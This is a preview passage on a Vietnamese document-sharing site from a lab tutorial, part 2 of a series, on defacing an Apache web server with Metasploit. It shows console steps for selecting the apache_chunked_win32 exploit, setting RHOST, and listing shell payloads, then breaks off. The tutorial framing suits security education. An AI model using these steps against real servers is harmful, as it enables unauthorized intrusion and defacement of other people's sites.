Danh mục

Các hoạt động phá hoại Web Server (Phần 2)

Số trang: 9      Loại file: pdf      Dung lượng: 166.56 KB      Lượt xem: 6      Lượt tải: 0    
Jamona

Hỗ trợ phí lưu trữ khi tải xuống: 5,000 VND Tải xuống file đầy đủ (9 trang) 0
Xem trước 2 trang đầu tiên của tài liệu này:

Thông tin tài liệu:

Các hoạt động phá hoại Web Server (Phần 2)Trong phần hai của loạt bài này chúng ta sẽ xem xét kỹ hơn cách thức deface (tức phá hoại hay thay đổi lại giao diện) một trang Web hoàn chỉnh. Công cụ được sử dụng ở đây là chương trình bảo mật nguồn mở khá nổi tiếng Metasploit Framework. Phần hướng dẫn chi tiết giúp bạn hiểu và tạo lại chương trình dễ dàng. Tóm tắt phần một Chúng ta sẽ tóm lược vắn tắt nội dung đã nêu ở phần một. Ở bài trước chúng ta đã nói đến cách...
Nội dung trích xuất từ tài liệu:
Các hoạt động phá hoại Web Server (Phần 2) Các hoạt động phá hoại Web Server (Phần 2)Trong phần hai của loạt bài này chúng ta sẽ xem xét kỹ hơn cách thứcdeface (tức phá hoại hay thay đổi lại giao diện) một trang Web hoànchỉnh. Công cụ được sử dụng ở đây là chương trình bảo mật nguồn mởkhá nổi tiếng Metasploit Framework. Phần hướng dẫn chi tiết giúp bạnhiểu và tạo lại chương trình dễ dàng.Tóm tắt phần mộtChúng ta sẽ tóm lược vắn tắt nội dung đã nêu ở phần một. Ở bài trước chúngta đã nói đến cách thức một Web server có thể bị deface như thế nào và giớithiệu công cụ sử dụng cho hoạt động thử nghiệm để tự deface là gì. Trướckhi tiếp tục xin được nhắc lại là các lỗ hổng tái tạo, hay trường hợp này làhoạt động deface Web server hoàn toàn hợp pháp trong chương trình học tậpvề bảo mật máy tính. Tuy nhiên bạn phải làm thử nghiệm ở môi trường thínghiệm như đã nêu trong phần một. Mặc dù biết có nhiều điểm hạn chế,nhưng ít nhất cũng thoả mãn được phần nào trí tò mò của bạn. Chúng tacũng sẽ khai thác Metasploit để hiểu sâu hơn về các hoạt động deface Webserver.Từ lý thuyết đến thực tếChúng ta sẽ tiếp tục với công cụ Metasploit và cách sử dụng nó. Trước hết làtăng mức hệ thống truy cập vào Web server Apache. Khi bạn thấy lớp ngoàiđảo ngược, bạn có thể upload file index.html đã được thay đổi. Nó sẽ trởthành trang mặc định được đưa lên server, chẳng hạn như bản dữ liệu logcủa công ty bạn.Phần bên dưới cho biết điều gì thu được sau câu lệnh show exploits (đưara các lỗ hổng) khi bạn nhập nó ở màn hình lệnh prompt msf trongMetasploit. Danh sách các lỗi hổng có thể khai thác được đưa ra:msf > show exploitsMetasploit Framework Loaded Exploits====================================Credits Metasploit Framework Credits AppleFileServer LoginExt PathNameafp_loginext Buffer Overflowapache_chunked_win32 Apache Win32 Chunked Encoding ISS PAM.dll ICQ Parser Bufferblackice_pam_icq Overflowdistcc_exec DistCC Daemon Command Execution Exchange 2000 MS03-46 Heapexchange2000_xexch50 Overflow Frontpage fp30reg.dll Chunkedfrontpage_fp30reg_chunked Encodingia_webmail IA WebMail 3.x Buffer Overflowiis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflowiis50_printer_overflow IIS 5.0 Printer Buffer Overflowiis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll OverflowBạn có thể thấy một số lỗ hổng có thể khai thác bên trong framework đã đưara. Danh sách trên đã được cắt bớt. Nếu bạn nhập cùng một lệnh như vậy,bạn sẽ có được danh sách đầy đủ. Chúng ta sẽ thử nghiệm với lỗ hổng thứhai từ trên xuống: apache_chunked_win32.Bây giờ nhập lệnh để chọn lỗ hổng chúng ta sẽ dùng như sau:msf > use apache_chunked_win32msf apache_chunked_win32 >Như bạn thấy ở trên, màn hình lệnh prompt xuất hiện trở lại, báo lại cho bạnbiết lỗ hổng đã được chọn để dùng: apache_chunked_win32. Tiếp theo làlệnh kiểm tra các tuỳ chọn khác nhau gắn kèm với lỗ hổng dưới frameworknày.msf apache_chunked_win32 > show optionsExploit Options===============Exploit Name Default Description -------- ------ ------- ------------------optional SSL Sử dụng SSLrequired RHOST Địa chỉ đíchrequired RPORT 80 Cổng đíchTarget: Windows NT/2K Brute Forcemsf apache_chunked_win32 >Màn hình lệnh xuất hiện trở lại với danh sách các tuỳ chọn chúng ta cần điềnđầy đủ như địa chỉ IP host từ xa. Chú ý là bạn cũng cần phải nhập địa chỉ IPhost cục bộ, ví dụ như địa chỉ các máy tấn công của bạn trong môi trườngthử nghiệm. Bạn cần nhập lệnh thiết lập các tuỳ chọn đó như sau:msf apache_chunked_win32 > set RHOST 192.168.1.101RHOST -> 192.168.1.101msf apache_chunked_win32 >Chúng ta sẽ xem tuỳ chọn LHOST ở phần sau trong bài này.Bạn thấy gì từ các tuỳ chọn khai thác lỗ hổng?Bây giờ chúng ta sẽ thiết lập giá trị cho trường này. Sau đó tiếp tục thực hiệndần dần với các tuỳ chọn khác nhau khác trước khi sử dụng lỗ hổng để tăngmức truy cập hệ thống trên Web server. Ở đây bạn sẽ dùng lệnh sau để xemchúng ta có thể dùng được loại payload nào:msf apache_chunked_win32 > show payloadsMetasploit Framework Usable Payloads====================================win32_bind Windows Bind Shellwin32_bind_dllinject Windows Bind DLL Injectwin32_bind_stg Windows Staged Bind Shell Windows Staged Bindwin32_bind_stg_upexec Upload/Execute Windows Bind VNC Serverwin32_bind_vncinject DLL Injectwin32_reverse Windows Reverse Shellwin32_reverse_dllinject Window ...

Tài liệu được xem nhiều: